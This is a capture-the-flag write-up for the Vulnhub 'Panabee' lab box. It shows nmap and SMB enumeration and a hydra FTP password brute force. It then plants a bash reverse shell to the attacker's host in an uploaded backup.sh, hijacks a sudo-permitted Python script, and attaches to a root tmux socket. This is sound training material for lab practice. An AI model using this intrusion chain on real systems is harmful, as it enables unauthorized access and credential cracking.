Vulnhub - Panabee

Posted on | In
My writeup on Panabee box.

Hi all, let’s pwn it! :)

You can find the machine there > Panabee

Enumeration/Reconnaissance

Let’s start always with nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
$ ip=192.168.1.8                
$ nmap -p- --min-rate 10000 $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 14:04 EEST
Nmap scan report for panabee.zte.com.cn (192.168.1.8)
Host is up (0.0011s latency).
Not shown: 65529 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:6C:D9:CE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.36 seconds
$ nmap -p 21,22,25,80,139,445 -sC -sV -oN nmap/initial $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-12 14:04 EEST
Nmap scan report for panabee.zte.com.cn (192.168.1.8)
Host is up (0.00032s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
| ssl-cert: Subject: commonName=panabee
| Subject Alternative Name: DNS:panabee
| Not valid before: 2020-06-14T18:25:48
|_Not valid after:  2030-06-12T18:25:48
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 00:0C:29:6C:D9:CE (VMware)
Service Info: Host:  panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -4s
|_nbstat: NetBIOS name: PANABEE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-12T11:05:08
|_  start_date: N/A

port 445 (SMB) seems interesting, let’s enumerate it.

SMB(server message block) is a protocol for sharing files.

First of all we have to list the shares, i always like to use the smbclient utility a client to access SMB shares.

1
2
3
4
5
6
7
8
9
$ smbclient -L //$ip    
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	note            Disk      Daily works
	IPC$            IPC       IPC Service (panabee server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

note share seems interesting, let’s connect to it using null session (without a password or sending a blank password):

note.txt provide us some useful info:

1
2
3
4
5
6
7
8
9
10
$ cat note.txt 
Dear goper, 

I'll just leave it here as a note,

Sorry for the late response,
The server will now `backup` you files in your home dir,
go ahead and backup anything you like, server will do it for you.

Please delete this note once you've read for security measure

1
2
1) username goper
2) backup your files in your home dir

Shell as goper

Let’s do FTP brute force using username goper:

1
2
3
4
5
6
7
8
9
$ hydra -l goper -P /usr/share/wordlists/rockyou.txt $ip ftp
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-12 14:39:46
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.1.8:21/
[STATUS] 264.00 tries/min, 264 tries in 00:01h, 14344135 to do in 905:34h, 16 active
[21][ftp] host: 192.168.1.8   login: goper   password: spiderman
1 of 1 target successfully completed, 1 valid password found

Perfect. Let’s connect to FTP & we can create a backup.sh file with a reverse shell in.

1
2
3
4
5
$ touch backup.sh
$ nano backup.sh 
$ cat backup.sh 
#!/bin/bash
bash -i >& /dev/tcp/192.168.1.16/5555 0>&1

Let’s upload it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ftp $ip
Connected to 192.168.1.8.
220 (vsFTPd 3.0.3)
Name (192.168.1.8:root): goper
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put backup.sh
local: backup.sh remote: backup.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
55 bytes sent in 0.00 secs (271.2674 kB/s)
ftp> chmod 777 backup.sh
200 SITE CHMOD command ok.

We have shell:

1
2
3
4
5
6
7
8
9
$ nc -lvp 5555
listening on [any] 5555 ...
goper@panabee:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
goper@panabee:~$ ^Z
[1]+  Stopped                 nc -lvp 5555
$ stty raw -echo
$ fg
goper@panabee:~$

goper -> jenny

Now privesc to user jenny is really easy, let’s check sudo -l:

1
2
3
4
5
6
7
goper@panabee:~$ sudo -l
Matching Defaults entries for goper on panabee:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goper may run the following commands on panabee:
    (jenny) NOPASSWD: /usr/bin/python3 /home/goper/status.py

We can run as jenny this python file. We can simple rename the status.py to status2.py and create our own status.py with our payload in.

1
2
3
4
5
6
7
8
9
goper@panabee:~$ mv status.py status2.py
goper@panabee:~$ touch status.py
goper@panabee:~$ cat - > status.py
import os
os.system("/bin/bash") 
^C
goper@panabee:~$ sudo -u jenny /usr/bin/python3 /home/goper/status.py
jenny@panabee:/home/goper$ whoami
jenny

jenny -> root

Great! Now privesc to root is easy too. If we check the command history we can see lot of tmux stuff:

1
2
3
4
5
6
7
8
9
10
11
12
jenny@panabee:/home/goper$ history | grep tmux
   38  tmux -S shareds attach
   46  cd .tmux-sessions/
   55  cd .tmux-sessions/
   59  man tmux
   62  tmux -S shareds attach
   63  ps aux | grep tmux
   64  pkill tmux
   68  tmux -S shareds attach -t sharedsession
   72  tmux -S default attach
   75  tmux -S default attach
... more data ...

Really weird, this seems like session sharing. We have to simply run this command but first we have find the default:

1
2
jenny@panabee:/home/goper$ find / -name "default" 2>/dev/null
/opt/.tmux-0/sockets/default

1
2
jenny@panabee:/home/goper$ export TERM=xterm
jenny@panabee:/home/goper$ tmux -S /opt/.tmux-0/sockets/default attach

We have root shell:

1
2
3
# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read the flag:

1
2
3
4
5
6
7
8
9
# cat proof.txt


 __                  __   ___  ___    
|__)  /\  |\ |  /\  |__) |__  |__     
|    /~~\ | \| /~~\ |__) |___ |___    
                                      

Congrats on rooting this machine. Give me a heads up at @aniqfakhrul on Twitter

Interesting box!